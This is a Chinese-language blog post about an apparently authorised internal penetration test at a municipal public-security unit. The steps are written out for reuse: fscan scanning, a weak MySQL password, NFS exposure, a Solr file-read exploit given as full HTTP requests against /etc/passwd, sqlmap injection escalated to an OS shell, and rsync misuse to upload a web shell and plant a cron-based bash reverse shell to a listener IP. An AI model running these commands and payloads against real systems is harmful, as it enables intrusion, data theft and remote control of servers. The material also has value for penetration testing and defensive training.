简单记录一次单位内部的渗透项目

某市的市局某单位
到了现场才知道攻击手就我一个，防火墙加白，漏扫随便用，蓝队坐我旁边辅助（乐
其实就相当于一次简单的内网设备的扫描+验证+渗透，资产都列好了

机子不出网，全程监控，前后都坐着一个工作人员，所以接下来的文章大部分只有纯文字
先简单说说成果，正面打下了XX系统、指挥中心系统、以及三个下属单位的系统，还有各种数据库
再说说发现：①单位的网站系统都是非常老旧的设备，渗透过程中遇到的几乎都是2008年甚至2006年的CMS，最新的系统竟然是2016年的一个apache solr
②单位的网站后台弱口令几乎没有，应该是有统一整改，但是！他们数据库的弱口令跟未授权非常多，遇到了大概10个redis未授权【可以直通shell】，还有七八个mysql/SQLserve/Oracle的弱口令，直接连上就能看到一堆数据。③单位服务器的端口开启非常多，所以对擅长一些端口入侵的朋友将会是天堂，在这篇文章中我也会介绍一个rsync端口的入侵，只要运维没配置好，rsync能直达shell！④蜜罐很多，非常多，但是一看就很明显，有几台蜜罐，我fscan扫面出了七八个poc，安了三大数据库都是弱口令，一眼就看出是个蜜罐了

———————-START——会着重讲几个例子
因为已经列了资产了，就不用自己做资产搜集了，方便快捷，后面才知道是怕我搜集资产给扫描到省级单位的资产然后市单位被通报了【乐
一上手先把准备好的工具包导进来，配好各种环境安装好各种工具
第一步，直接fscan梭哈一下第一个C段 fscan是真好用(强强推荐)
fscan64.exe -h 10.x.x.0/24 -o 10-x-x-C.txt
↑这是我常用的命令，扫一个C段大概只要3分钟，资产少的话一分多钟就能搞定了，扫描出的结果用everedit打开
直接ctrl+f，搜索字符[+]，一些poc验证以及指纹识别的信息都会以[+]开头来显示，你可以先看这些有效结果，再仔细看正常的[*]探测结果
第一个[+]，mysql弱口令 root/root，连接上去，数据量有点多，不敢细看（旁边的蜀黍已经脸黑了，简单记录下数据量大小，新建个查询，尝试执行系统命令
system whoami;
然后…报错？？？回显是语法错误？？？我寻思也没啥语法错啊？？捣鼓了好久，没搞明白，摆了，下一个（希望有大佬可以解答下我这个疑问555

第x个[+]，NFS未授权访问（有十几个ip都存在这个问题）
NFS->网络文件系统，它允许网络中的计算机之间通过TCP/IP网络共享资源。NFS对应111端口
在NFS的应用中，本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件，就像访问本地文件一样。若运维人员未对文件访问进行控制，将导致本地文件可被任意读取。
所以，利用nmap来探测下这个未授权
nmap —script nfs-showmount IP
然后你就能看到一些返回的路径
↓网图
、
然后在映射网络器里，把这个连接添加进去，你就可以上去访问一些文件了

换下一个网段
fscan扫描出一个apache solr的未授权访问，apache solr这可是我最擅长的漏洞

首先第一个 任意文件读取
条件，下图的core admin里必须有core，没有就不行

然后路径/solr/core_name/config POST以下数据包
core_name -> 上方core admin里获得到的core名

STEP 1 调整配置，允许远程读取数据流
POST /solr/core_name/config HTTP/1.1
Host: xxxxxx:xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 80

{“set-property”:{“requestDispatcher.requestParsers.enableRemoteStreaming”:true}}
STEP 2 读取文件
POST /solr/core_name/debug/dump?param=ContentStreams HTTP/1.1
Host: IP:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

stream.url=file:///etc/passwd

对于solr，任意读取完了还有很多漏洞，比如AND命令执行，比如Log4j，比如XML注入。具体信息大家可以查看这个链接https://blog.csdn.net/yangbz123/article/details/117827547
这里提一个小tips：今年1月在对自己学校的网站渗透时挖到个log4j，一个php的课程网站却有log4j，很是疑问，和学校的老师沟通完了后才得知，这台服务器底层用了apache solr来进行一些课程搜索的功能，所以当我在查询处打入log4j payload的时候，payload就会被带入solr去执行而后RCE。因此大家在遇到一些具有文本查询搜索功能的服务器，它有恰好是apache的，你可以尝试打入log4j的payload，说不定会有惊喜哦

下一个网站是XX系统，验证完fscan的[+]后，我把目光移向了[*]，当我访问其中一个网站时，我发现它的右下角有个登录界面，我想着这系统看着真老，于是简单抓了个包，然后开始跑
第一遍命令 sqlmap -r 1.txt 简单测试，没有什么回显
但是经过我手测，我怀疑password参数可能有注入点，于是打个*重新跑，还是没有结果，不死心把*打在uname上，于是，惊喜就出现了，一台sqlserver的sql注入就出现了，意外的还是一个堆叠注入,—is-dba返回true，所以直接—os-shell梭哈了
有了这个经验，我在后面的渗透中，遇到出现?id的公告界面或是其他界面都我直接抓包sqlmap梭哈，意外的打出了不少注入（80%的文章显示页均有sql注入，可以参考猫舍，不过大部分的注入都是access，我真的吐血

下一个点，Rsync端口入侵。
扫描时发现某一个c段有几十台开启了rsync服务，于是就想到了这个的端口入侵，说不定可以直达shell

rsync是Linux下一款数据备份工具，支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口，如果目标开启了rsync服务，并且没有配置ACL或访问密码，我们将可以读写目标服务器文件。

那就很简单了
nmap -p 873 —script rsync-list-modules IP

很好，根据返货说明存在rsync未授权，于是我们利用kali
命令：rsync rsync://ip:873
查看模块目录

根据回显存在src目录
那就rsync rsync://ip:873/src

说明权限较高，接下来我们有两个方向可以走
一，当这个网站开启了web服务而我们又翻到了它的根目录，我们可以在本地写个shell而后执行命令 rsync -av shell.php rsync://ip:873/src/var/wwww
将shell上传而后蚁剑直连
二、访问/src/etc/crontab定时任务目录
在本地写个.sh文件
#!/bin/bash /bin/bash -i >& /dev/tcp/192.168.182.199/4444 0>&1
而后利用chmod赋予其执行权限
chmod +x shell
再上传至定时任务
rsync -av shell rsync://ip:873/src/etc/cron.hourly
等个1个小时它就会反弹回来了

————-END
简单做个小结，单位的内部系统年份都是久远，因此非常的脆弱，他们的防护全靠ips跟waf堆着，只要突破了防护，一切就是轻轻松松。还有个思路就是，他们会对一些公网的服务器开白（便于领导操作。
只要你拿下了开白的服务器，后续也是一路畅通